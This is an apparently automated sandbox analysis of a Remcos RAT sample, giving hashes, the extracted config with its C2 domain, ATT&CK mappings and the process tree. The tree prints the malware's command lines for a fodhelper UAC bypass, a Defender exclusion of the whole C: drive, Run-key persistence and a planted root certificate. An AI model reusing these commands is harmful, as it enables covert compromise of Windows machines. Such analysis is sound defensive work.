remcos | e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
26/07/2024, 06:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe
Size

1.1MB
MD5

2d655119c0aa977debf88758f2009729
SHA1

40c98ca63e9f78284cddbefddc03b6c6ad070462
SHA256

e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9
SHA512

fe96ee94b8c57c76650288eb589eb41b0430ea45597d025c1ecead87cafd75d5bb58204999ca78f736f54b26b247959d079a498784bdcb274bc159fcc4b395c8
SSDEEP

24576:Edd+fYkdMwkRdF36Xq5W2xnXuWmStY6mATIU:EHkvXqE2NXufB6Xv

Score

10^/10

remcos remotehost discovery persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

127.0.0.1:45645

127.0.0.1:56765

latestgrace2024.duckdns.org:56765

latestgrace2024.duckdns.org:45645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-2ZXBPR
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	ioeztdcY.pif
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	per.exe

Executes dropped EXE 21 IoCs

pid	Process
636	ioeztdcY.pif
3940	alpha.exe
1964	alpha.exe
1744	alpha.exe
3572	alpha.exe
4636	alpha.exe
4204	alpha.exe
900	alpha.exe
4224	xkn.exe
3796	alpha.exe
4692	ger.exe
3420	per.exe
3940	alpha.exe
3904	alpha.exe
2560	alpha.exe
4404	alpha.exe
3472	alpha.exe
3256	alpha.exe
4372	alpha.exe
4632	alpha.exe
3252	alpha.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ycdtzeoi = "C:\\Users\\Public\\Ycdtzeoi.url"	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2380 set thread context of 636	2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe	94

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ioeztdcY.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SndVol.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2560	alpha.exe
4636	alpha.exe
772	PING.EXE
4668	PING.EXE

Kills process with taskkill 3 IoCs

evasion

pid	Process
2492	taskkill.exe
3452	taskkill.exe
4288	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\ms-settings\shell\open\command	ger.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	xkn.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	xkn.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	xkn.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
772	PING.EXE
4668	PING.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
4224	xkn.exe
4224	xkn.exe
4224	xkn.exe
2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe
2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4224	xkn.exe
Token: SeDebugPrivilege	2492	taskkill.exe
Token: SeDebugPrivilege	3452	taskkill.exe
Token: SeDebugPrivilege	4288	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1448	SndVol.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1448	SndVol.exe
1448	SndVol.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 636	2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe	94
PID 2380 wrote to memory of 636	2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe	94
PID 2380 wrote to memory of 636	2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe	94
PID 2380 wrote to memory of 636	2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe	94
PID 2380 wrote to memory of 636	2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe	94
PID 636 wrote to memory of 1364	636	ioeztdcY.pif	95
PID 636 wrote to memory of 1364	636	ioeztdcY.pif	95
PID 1364 wrote to memory of 4720	1364	cmd.exe	98
PID 1364 wrote to memory of 4720	1364	cmd.exe	98
PID 1364 wrote to memory of 3940	1364	cmd.exe	99
PID 1364 wrote to memory of 3940	1364	cmd.exe	99
PID 1364 wrote to memory of 1964	1364	cmd.exe	100
PID 1364 wrote to memory of 1964	1364	cmd.exe	100
PID 1364 wrote to memory of 1744	1364	cmd.exe	101
PID 1364 wrote to memory of 1744	1364	cmd.exe	101
PID 1744 wrote to memory of 4816	1744	alpha.exe	102
PID 1744 wrote to memory of 4816	1744	alpha.exe	102
PID 1364 wrote to memory of 3572	1364	cmd.exe	103
PID 1364 wrote to memory of 3572	1364	cmd.exe	103
PID 3572 wrote to memory of 3588	3572	alpha.exe	104
PID 3572 wrote to memory of 3588	3572	alpha.exe	104
PID 1364 wrote to memory of 4636	1364	cmd.exe	105
PID 1364 wrote to memory of 4636	1364	cmd.exe	105
PID 4636 wrote to memory of 772	4636	alpha.exe	106
PID 4636 wrote to memory of 772	4636	alpha.exe	106
PID 1364 wrote to memory of 2776	1364	cmd.exe	107
PID 1364 wrote to memory of 2776	1364	cmd.exe	107
PID 1364 wrote to memory of 4204	1364	cmd.exe	108
PID 1364 wrote to memory of 4204	1364	cmd.exe	108
PID 4204 wrote to memory of 4860	4204	alpha.exe	110
PID 4204 wrote to memory of 4860	4204	alpha.exe	110
PID 1364 wrote to memory of 900	1364	cmd.exe	111
PID 1364 wrote to memory of 900	1364	cmd.exe	111
PID 900 wrote to memory of 4224	900	alpha.exe	112
PID 900 wrote to memory of 4224	900	alpha.exe	112
PID 4224 wrote to memory of 3796	4224	xkn.exe	113
PID 4224 wrote to memory of 3796	4224	xkn.exe	113
PID 3796 wrote to memory of 4692	3796	alpha.exe	114
PID 3796 wrote to memory of 4692	3796	alpha.exe	114
PID 1364 wrote to memory of 3420	1364	cmd.exe	115
PID 1364 wrote to memory of 3420	1364	cmd.exe	115
PID 2380 wrote to memory of 1568	2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe	116
PID 2380 wrote to memory of 1568	2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe	116
PID 2380 wrote to memory of 1568	2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe	116
PID 2380 wrote to memory of 1448	2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe	119
PID 2380 wrote to memory of 1448	2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe	119
PID 2380 wrote to memory of 1448	2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe	119
PID 2380 wrote to memory of 1448	2380	e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe	119
PID 1364 wrote to memory of 3940	1364	cmd.exe	122
PID 1364 wrote to memory of 3940	1364	cmd.exe	122
PID 3940 wrote to memory of 2492	3940	alpha.exe	123
PID 3940 wrote to memory of 2492	3940	alpha.exe	123
PID 1364 wrote to memory of 3904	1364	cmd.exe	126
PID 1364 wrote to memory of 3904	1364	cmd.exe	126
PID 3904 wrote to memory of 3452	3904	alpha.exe	127
PID 3904 wrote to memory of 3452	3904	alpha.exe	127
PID 1364 wrote to memory of 2560	1364	cmd.exe	128
PID 1364 wrote to memory of 2560	1364	cmd.exe	128
PID 2560 wrote to memory of 4668	2560	alpha.exe	129
PID 2560 wrote to memory of 4668	2560	alpha.exe	129
PID 1364 wrote to memory of 4404	1364	cmd.exe	130
PID 1364 wrote to memory of 4404	1364	cmd.exe	130
PID 1364 wrote to memory of 3472	1364	cmd.exe	131
PID 1364 wrote to memory of 3472	1364	cmd.exe	131

C:\Users\Admin\AppData\Local\Temp\e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe
"C:\Users\Admin\AppData\Local\Temp\e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Users\Public\Libraries\ioeztdcY.pif
  C:\Users\Public\Libraries\ioeztdcY.pif
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:636
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F676.tmp\F677.tmp\F678.bat C:\Users\Public\Libraries\ioeztdcY.pif"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1364
  - - C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      4⤵
      PID:4720
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
      4⤵
      Executes dropped EXE
      PID:3940
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
      4⤵
      Executes dropped EXE
      PID:1964
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1744
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        5⤵
        
        PID:4816
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3572
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
        5⤵
        
        PID:3588
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
      4⤵
      Executes dropped EXE
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:4636
    - - C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 2
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:772
  - - C:\Windows\system32\cmd.exe
      cmd.exe
      4⤵
      PID:2776
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4204
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
        5⤵
        
        PID:4860
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:900
    - - C:\Users\Public\xkn.exe
        
        C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4224
      - C:\Users\Public\alpha.exe
        
        "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3796
        
        C:\Users\Public\ger.exe
        
        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        7⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4692
  - - C:\Windows \System32\per.exe
      "C:\\Windows \\System32\\per.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:3420
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM SystemSettings.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2492
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3904
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM SystemSettingsAdminFlows.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3452
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
      4⤵
      Executes dropped EXE
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:2560
    - - C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 2
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4668
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
      4⤵
      Executes dropped EXE
      PID:4404
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
      4⤵
      Executes dropped EXE
      PID:3472
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
      4⤵
      Executes dropped EXE
      PID:3256
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
      4⤵
      Executes dropped EXE
      PID:4372
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
      4⤵
      Executes dropped EXE
      PID:4632
  - - C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c taskkill /F /IM cmd.exe
      4⤵
      Executes dropped EXE
      PID:3252
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM cmd.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4288
- C:\Windows\SysWOW64\extrac32.exe
  C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe C:\\Users\\Public\\Libraries\\Ycdtzeoi.PIF
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1568
- C:\Windows\SysWOW64\SndVol.exe
  C:\Windows\System32\SndVol.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1448

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:4976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
130B

MD5
4ef95ef2f8be7b21a854434b47030af0

SHA1
55bab9bf582ce29503f642efa3a3943cfce6c7ba

SHA256
837974dd9419022ff2b23285b467923dbdb99d2f1e3077fbc236ee0a24980841

SHA512
bd7333b8cb5fdf6272e602d60d48a4eb472ec44fe18e2f2122dd23d68da8c7de4d86157469e2710a14587d48154c523189ec7939ebaac87ffecfb4c4cf21048b

Download Submit
C:\Users\Admin\AppData\Local\Temp\F676.tmp\F677.tmp\F678.bat

Filesize
1KB

MD5
54147a112fd4c4fffbdeb2eeab926f59

SHA1
7f4ae3d3dd6202e47bc02438a947065c7ed115a9

SHA256
b040ccd004e2e55f8ad1b022388bbcc72eefd37f122ec2c5ef1601ecabd7dc46

SHA512
20c214b5efb1c70df2704fb487d9ba4fddbc87e1e295d9b7320ce1617f532dc0fd814a016f91ae161ba506a20dcbcea337c6bbec74edb71824035334608b2488

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ogz5cutf.gd1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Libraries\ioeztdcY.pif

Filesize
66KB

MD5
c116d3604ceafe7057d77ff27552c215

SHA1
452b14432fb5758b46f2897aeccd89f7c82a727d

SHA256
7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

SHA512
9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

Download Submit
C:\Users\Public\alpha.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\ger.exe

Filesize
75KB

MD5
227f63e1d9008b36bdbcc4b397780be4

SHA1
c0db341defa8ef40c03ed769a9001d600e0f4dae

SHA256
c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

SHA512
101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
